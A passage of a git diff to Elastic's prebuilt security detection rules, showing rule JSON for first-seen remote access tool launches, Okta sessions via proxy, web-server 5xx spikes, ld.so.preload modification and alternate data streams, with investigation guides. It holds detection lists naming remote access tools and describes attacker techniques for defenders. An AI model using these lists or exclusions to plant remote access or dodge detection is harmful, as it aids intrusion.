\"GoToAssistService.exe\" or\n \"gotohttp.exe\" or\n \"jumpcloud-agent.exe\" or\n \"level.exe\" or\n \"LvAgent.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"MeshAgent.exe\" or\n \"meshagent.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"parsec.exe\" or\n \"PService.exe\" or\n \"quickassist.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n \"session_win.exe\" or\n \"Remote Support.exe\" or\n \"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"Syncro.Overmind.Service.exe\" or\n \"SyncroLive.Agent.Runner.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"tacticalrmm.exe\" or\n \"tailscale.exe\" or\n \"tailscaled.exe\" or\n \"teamviewer.exe\" or\n \"TiClientCore.exe\" or\n \"ToDesk_Service.exe\" or\n \"twingate.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n \"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\" or\n \"Velociraptor.exe\" or\n \"ToolsIQ.exe\" or \n\t\t\t\"ScreenConnect.ClientService.exe\" or \n\t\t\t\"TiAgent.exe\" or \n\t\t\t\"GoToResolveProcessChecker.exe\" or \n\t\t\t\"GoToResolveUnattended.exe\" or \n\t\t\t\"Syncro.Installer.exe\"\n ) or\n process.parent.code_signature.subject_name : (\n \"Action1 Corporation\" or\n \"AeroAdmin LLC\" or\n \"Ammyy LLC\" or\n \"Atera Networks Ltd\" or\n \"AWERAY PTE. LTD.\" or\n \"BeamYourScreen GmbH\" or\n \"Bomgar Corporation\" or\n \"DUC FABULOUS CO.,LTD\" or\n \"DOMOTZ INC.\" or\n \"DWSNET O\u00dc\" or\n \"FleetDeck Inc\" or\n \"GlavSoft LLC\" or\n \"GlavSoft LLC.\" or\n \"Hefei Pingbo Network Technology Co. Ltd\" or\n \"IDrive, Inc.\" or\n \"IMPERO SOLUTIONS LIMITED\" or\n \"Instant Housecall\" or\n \"ISL Online Ltd.\" or\n \"LogMeIn, Inc.\" or\n \"Monitoring Client\" or\n \"MMSOFT Design Ltd.\" or\n \"Nanosystems S.r.l.\" or\n \"NetSupport Ltd\" or\n \"NetSupport Ltd.\" or\n \"NETSUPPORT LTD.\" or\n \"NinjaRMM, LLC\" or\n \"Parallels International GmbH\" or\n \"philandro Software GmbH\" or\n \"Pro Softnet Corporation\" or\n \"RealVNC\" or\n \"RealVNC Limited\" or\n \"BreakingSecurity.net\" or\n \"Remote Utilities LLC\" or\n \"Rocket Software, Inc.\" or\n \"SAFIB\" or\n \"Servably, Inc.\" or\n \"ShowMyPC INC\" or\n \"Splashtop Inc.\" or\n \"Superops Inc.\" or\n \"TeamViewer\" or\n \"TeamViewer GmbH\" or\n \"TeamViewer Germany GmbH\" or\n \"Techinline Limited\" or\n \"uvnc bvba\" or\n \"Yakhnovets Denis Aleksandrovich IP\" or\n \"Zhou Huabing\" or\n \"ZOHO Corporation Private Limited\" or\n \"Connectwise, LLC\" or \n\t\t\t\"ScreenConnect Client\" or\n\t\t\t\"Servably Inc.\"\n ) or\n process.parent.name: (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"AgentMon.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"g2aservice.exe\" or\n \"GoToAssistService.exe\" or\n \"gotohttp.exe\" or\n \"jumpcloud-agent.exe\" or\n \"level.exe\" or\n \"LvAgent.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"MeshAgent.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"parsec.exe\" or\n \"PService.exe\" or\n \"quickassist.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n \"session_win.exe\" or\n \"Remote Support.exe\" or\n \"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"Syncro.Overmind.Service.exe\" or\n \"SyncroLive.Agent.Runner.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"tacticalrmm.exe\" or\n \"tailscale.exe\" or\n \"tailscaled.exe\" or\n \"teamviewer.exe\" or\n \"ToDesk_Service.exe\" or\n \"twingate.exe\" or\n \"TiClientCore.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n \"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\" or\n \"Velociraptor.exe\" or\n \"ToolsIQ.exe\" or\n \"CagService.exe\" or \n\t\t\t\"TiAgent.exe\" or \n\t\t\t\"GoToResolveProcessChecker.exe\" or \n\t\t\t\"GoToResolveUnattended.exe\"\n )\n ) and\n not (process.pe.original_file_name : (\"G2M.exe\" or \"Updater.exe\" or \"powershell.exe\") and process.code_signature.subject_name : \"LogMeIn, Inc.\")\n", + "references": [ + "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", + "https://attack.mitre.org/techniques/T1219/002/", + "https://github.com/redcanaryco/surveyor/blob/master/definitions/remote-admin.json", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a", + "https://www.cisa.gov/sites/default/files/2025-06/aa25-163a-ransomware-simplehelp-rmm-compromise.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6e1a2cc4-d260-11ed-8829-f661ea17fbcc", + "setup": "## Setup\n\n- **New terms window**: The rule uses `new_terms_fields: host.id` with a 7-day history window. The first time a matching RMM/remote access process is seen on a host within that window will trigger the alert.\n- **Velociraptor**: If your organization deploys Velociraptor for DFIR or hunting, consider adding a rule exception by host group or excluding `process.name: \"Velociraptor.exe\"` where appropriate.\n- **Elastic Defend**: For best coverage ensure process events with `process.code_signature` and `process.name` are ingested from Windows endpoints (e.g. logs-endpoint.events.process-*).\n- **Parent matching**: The rule also matches when the started process's parent has an RMM/remote access name or code signer, so first-time child processes (e.g. scripts or binaries spawned by TeamViewer, ScreenConnect, AteraAgent, MeshAgent) are detected. Complement with DNS-based detection (e.g. Sigma rule for remote access software domains from non-browser processes) for full coverage.\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/", + "subtechnique": [ + { + "id": "T1219.002", + "name": "Remote Desktop Software", + "reference": "https://attack.mitre.org/techniques/T1219/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 116 + }, + "id": "6e1a2cc4-d260-11ed-8829-f661ea17fbcc_116", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_207.json b/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_207.json deleted file mode 100644 index fdb10464f88..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the first occurrence of an Okta user session started via a proxy.", - "history_window_start": "now-7d", - "index": [ - "filebeat-*", - "logs-okta*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "First Occurrence of Okta User Session Started via Proxy", - "new_terms_fields": [ - "okta.actor.id", - "cloud.account.id" - ], - "note": "## Triage and analysis\n\n### Investigating First Occurrence of Okta User Session Started via Proxy\n\nThis rule detects the first occurrence of an Okta user session started via a proxy. This rule is designed to help identify suspicious authentication behavior that may be indicative of an attacker attempting to gain access to an Okta account while remaining anonymous. This rule leverages the New Terms rule type feature where the `okta.actor.id` value is checked against the previous 7 days of data to determine if the value has been seen before for this activity.\n\n#### Possible investigation steps:\n- Identify the user involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the client used by the actor. Review the `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- Examine the `okta.debug_context.debug_data.flattened` field for more information about the proxy used.\n- Review the `okta.request.ip_chain` field for more information about the geographic location of the proxy.\n- Review the past activities of the actor involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n\n### False positive analysis:\n- A user may have legitimately started a session via a proxy for security or privacy reasons.\n\n### Response and remediation:\n- Review the profile of the user involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting the user's password and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the user.\n- If the user is not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.", - "query": "event.dataset:okta.system and okta.event_type: (user.session.start or user.authentication.verify) and okta.security_context.is_proxy:true and not okta.actor.id: okta*\n", - "references": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://developer.okta.com/docs/reference/api/system-log/#issuer-object", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "related_integrations": [ - { - "package": "okta", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": false, - "name": "okta.actor.id", - "type": "keyword" - }, - { - "ecs": false, - "name": "okta.event_type", - "type": "keyword" - }, - { - "ecs": false, - "name": "okta.security_context.is_proxy", - "type": "boolean" - } - ], - "risk_score": 47, - "rule_id": "6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Tactic: Initial Access", - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1133", - "name": "External Remote Services", - "reference": "https://attack.mitre.org/techniques/T1133/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 207 - }, - "id": "6f1bb4b2-7dc8-11ee-92b2-f661ea17fbcd_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6fa3abe3-9cd8-41de-951b-51ed8f710523_3.json b/packages/security_detection_engine/kibana/security_rule/6fa3abe3-9cd8-41de-951b-51ed8f710523_3.json new file mode 100644 index 00000000000..f798e35660d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6fa3abe3-9cd8-41de-951b-51ed8f710523_3.json @@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects unusual spikes in error response codes (500, 502, 503, 504) from web servers, which may indicate reconnaissance activities such as vulnerability scanning or fuzzing attempts by adversaries. These activities often generate a high volume of error responses as they probe for weaknesses in web applications. Error response codes may potentially indicate server-side issues that could be exploited.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Web Server Potential Spike in Error Response Codes", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Web Server Potential Spike in Error Response Codes\n\nThis rule detects bursts of 5xx errors (500\u2013504) from GET traffic, highlighting abnormal server behavior that accompanies active scanning or fuzzing and exposes fragile code paths or misconfigured proxies. Attackers sweep common and generated endpoints while mutating query params and headers\u2014path traversal, template syntax, large payloads\u2014to repeatedly force backend exceptions and gateway timeouts, enumerate which routes fail, and pinpoint inputs that leak stack traces or crash components for follow-on exploitation.\n\n### Possible investigation steps\n\n- Plot error rates per minute by server and client around the alert window to confirm the spike, determine scope, and separate a single noisy client from a platform-wide issue.\n- Aggregate the failing URL paths and query strings from the flagged client and look for enumeration sequences, traversal encoding, template injection markers, or oversized inputs indicative of fuzzing.\n- Examine User-Agent, Referer, header mix, and TLS JA3 for generic scanner signatures or reuse across multiple clients, and enrich the originating IP with reputation and hosting-provider attribution.\n- Correlate the timeframe with reverse proxy/WAF/IDS and application error logs or stack traces to identify which routes threw exceptions or timeouts and whether they align with the client\u2019s input patterns.\n- Validate backend and dependency health (upstreams, databases, caches, deployments) to rule out infrastructure regressions, then compare whether only the suspicious client experiences disproportionate failures.\n\n### False positive analysis\n\n- A scheduled deployment or upstream dependency issue can cause normal GET traffic to fail with 502/503/504, and many users egressing through a shared NAT or reverse proxy may be aggregated as one source IP that triggers the spike.\n- An internal health-check, load test, or site crawler running from a single host can rapidly traverse endpoints and induce 500 errors on fragile routes, mimicking scanner-like behavior without malicious intent.\n\n### Response and remediation\n\n- Immediately rate-limit or block the originating client(s) at the edge (reverse proxy/WAF) using the observed source IPs, User-Agent/TLS fingerprints, and the failing URL patterns generating 5xx bursts.\n- Drain the origin upstream(s) showing repeated 500/502/503/504 on the probed routes, roll back the latest deployment or config change for those services, and disable any unstable endpoint or plugin that is crashing under input fuzzing.\n- Restart affected application workers and proxies, purge bad cache entries, re-enable traffic gradually with canary percentage, and confirm normal response rates via synthetic checks against the previously failing URLs.\n- Escalate to Security Operations and Incident Response if 5xx spikes persist after blocking or if error pages expose stack traces, credentials, or admin route disclosures, or if traffic originates from multiple global hosting ASNs.\n- Deploy targeted WAF rules for path traversal and injection markers seen in the URLs, enforce per-IP and per-route rate limits, tighten upstream timeouts/circuit breakers, and replace verbose error pages with generic responses that omit stack details.\n- Add bot management and IP reputation blocking at the CDN/edge, lock down unauthenticated access to admin/debug routes, and instrument alerts that trigger on sustained 5xx bursts per client and per route with automatic edge throttling.\n", + "query": "from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-*\n| where\n http.request.method == \"GET\" and\n http.response.status_code in (\n 500, // Internal Server Error\n 502, // Bad Gateway\n 503, // Service Unavailable\n 504 // Gateway Timeout\n )\n\n| eval Esql.url_original_to_lower = to_lower(url.original)\n\n| keep\n @timestamp,\n event.dataset,\n http.request.method,\n http.response.status_code,\n source.ip,\n agent.id,\n agent.name,\n Esql.url_original_to_lower,\n data_stream.namespace\n\n| stats\n Esql.event_count = count(),\n Esql.http_response_status_code_count = count(http.response.status_code),\n Esql.http_response_status_code_values = values(http.response.status_code),\n Esql.agent_name_values = values(agent.name),\n Esql.agent_id_values = values(agent.id),\n Esql.http_request_method_values = values(http.request.method),\n Esql.http_response_status_code_values = values(http.response.status_code),\n Esql.url_path_values = values(Esql.url_original_to_lower),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace)\n by source.ip, agent.id\n| where\n Esql.http_response_status_code_count > 10\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^3.0.0" + }, + { + "package": "apache", + "version": "^3.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.0.0" + }, + { + "package": "iis", + "version": "^1.0.0" + }, + { + "package": "traefik", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.agent_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http_request_method_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http_response_status_code_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.http_response_status_code_values", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_path_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "6fa3abe3-9cd8-41de-951b-51ed8f710523", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 3 + }, + "id": "6fa3abe3-9cd8-41de-951b-51ed8f710523_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_211.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_211.json deleted file mode 100644 index e8204552b64..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_211.json +++ /dev/null @@ -1,108 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries.", - "from": "now-9m", - "history_window_start": "now-10d", - "index": [ - "auditbeat-*", - "logs-endpoint.events.*", - "endgame-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Modification of Dynamic Linker Preload Shared Object", - "new_terms_fields": [ - "host.id", - "user.id", - "process.executable" - ], - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Modification of Dynamic Linker Preload Shared Object\n\nThe dynamic linker preload mechanism in Linux, via `/etc/ld.so.preload`, allows preloading of shared libraries, influencing how executables load dependencies. Adversaries exploit this by inserting malicious libraries, hijacking execution flow for privilege escalation. The detection rule monitors changes to this file, excluding benign processes, to identify unauthorized modifications indicative of such abuse.\n\n### Possible investigation steps\n\n- Review the alert details to confirm the file path involved is /etc/ld.so.preload and verify the event action is one of the specified actions: updated, renamed, or file_rename_event.\n- Identify the process responsible for the modification by examining the process.name field, ensuring it is not one of the excluded processes (wine or oneagentinstallaction).\n- Investigate the process that triggered the alert by gathering additional context such as process ID, command line arguments, and parent process to understand its origin and purpose.\n- Check the modification timestamp and correlate it with other system events or logs to identify any suspicious activity or patterns around the time of the modification.\n- Analyze the contents of /etc/ld.so.preload to determine if any unauthorized or suspicious libraries have been added, and assess their potential impact on the system.\n- Review user accounts and permissions associated with the process to determine if there has been any unauthorized access or privilege escalation attempt.\n- If malicious activity is confirmed, isolate the affected system and follow incident response procedures to mitigate the threat and prevent further exploitation.\n\n### False positive analysis\n\n- Legitimate software installations or updates may modify /etc/ld.so.preload. To handle this, monitor the process names associated with these activities and consider adding them to the exclusion list if they are verified as benign.\n- System management tools like configuration management software might update /etc/ld.so.preload as part of routine operations. Identify these tools and exclude their process names from the detection rule to prevent false alerts.\n- Custom scripts or administrative tasks executed by trusted users could inadvertently trigger the rule. Review these scripts and, if necessary, exclude their process names or user accounts from the detection criteria.\n- Security agents or monitoring tools that interact with system files might cause false positives. Verify these tools' activities and exclude their process names if they are known to be safe and necessary for system operations.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further exploitation or lateral movement by the adversary.\n- Terminate any suspicious processes that are not part of the baseline or known benign applications, especially those related to the modification of `/etc/ld.so.preload`.\n- Restore the `/etc/ld.so.preload` file from a known good backup to ensure no malicious libraries are preloaded.\n- Conduct a thorough review of recent system changes and installed packages to identify any unauthorized software or modifications that may have facilitated the attack.\n- Escalate the incident to the security operations team for a deeper forensic analysis to determine the scope of the compromise and identify any additional affected systems.\n- Implement additional monitoring on the affected system and similar environments to detect any further attempts to modify the dynamic linker preload file.\n- Review and enhance access controls and permissions on critical system files like `/etc/ld.so.preload` to prevent unauthorized modifications in the future.", - "query": "host.os.type:linux and event.category:file and event.action:(file_rename_event or rename or renamed or updated) and\nnot event.type:deletion and file.path:/etc/ld.so.preload and\nprocess.name:(* and not (oneagentinstallaction or passwd or wine))\n", - "references": [ - "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "717f82c2-7741-4f9b-85b8-d06aeb853f4f", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1574", - "name": "Hijack Execution Flow", - "reference": "https://attack.mitre.org/techniques/T1574/", - "subtechnique": [ - { - "id": "T1574.006", - "name": "Dynamic Linker Hijacking", - "reference": "https://attack.mitre.org/techniques/T1574/006/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 211 - }, - "id": "717f82c2-7741-4f9b-85b8-d06aeb853f4f_211", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_322.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_322.json new file mode 100644 index 00000000000..37332c33b9e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_322.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious creation of Alternate Data Streams on highly targeted files using a script or command interpreter. This is uncommon for legitimate files and sometimes done by adversaries to hide malware.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual File Creation - Alternate Data Stream", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file 